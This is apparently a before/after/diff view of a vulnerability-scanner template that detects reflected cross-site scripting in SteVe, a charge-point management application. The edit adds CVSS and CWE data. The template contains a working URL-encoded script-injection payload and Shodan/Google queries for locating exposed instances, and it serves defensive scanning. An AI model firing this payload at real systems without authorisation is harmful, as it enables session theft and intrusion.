vulnerabilities/other/steve-xss.yaml (before)
id: steve-xss

info:
  name: SteVe - Cross-Site Scripting
  author: clem9669
  severity: medium
  description: |
    The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
  reference:
    - https://github.com/steve-community/steve
  metadata:
    verified: true
    shodan-query: http.title:"SteVe - Steckdosenverwaltung"
    google-query: intitle:"SteVe - Steckdosenverwaltung"
  tags: steve,xss,oss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
      - '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/services/?stylesheet=1">'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

vulnerabilities/other/steve-xss.yaml (after)
id: steve-xss

info:
  name: SteVe - Cross-Site Scripting
  author: clem9669
  severity: medium
  description: |
    SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/steve-community/steve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    shodan-query: http.title:"SteVe - Steckdosenverwaltung"
    google-query: intitle:"SteVe - Steckdosenverwaltung"
  tags: steve,xss,oss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
      - '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/services/?stylesheet=1">'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by md on 2022/12/13

vulnerabilities/other/steve-xss.yaml (diff)
@@ -5,9 +5,13 @@ info:
   author: clem9669
   severity: medium
   description: |
-    The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
+    SteVe contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://github.com/steve-community/steve
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cwe-id: CWE-80
   metadata:
     verified: true
     shodan-query: http.title:"SteVe - Steckdosenverwaltung"
@@ -36,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/12/13
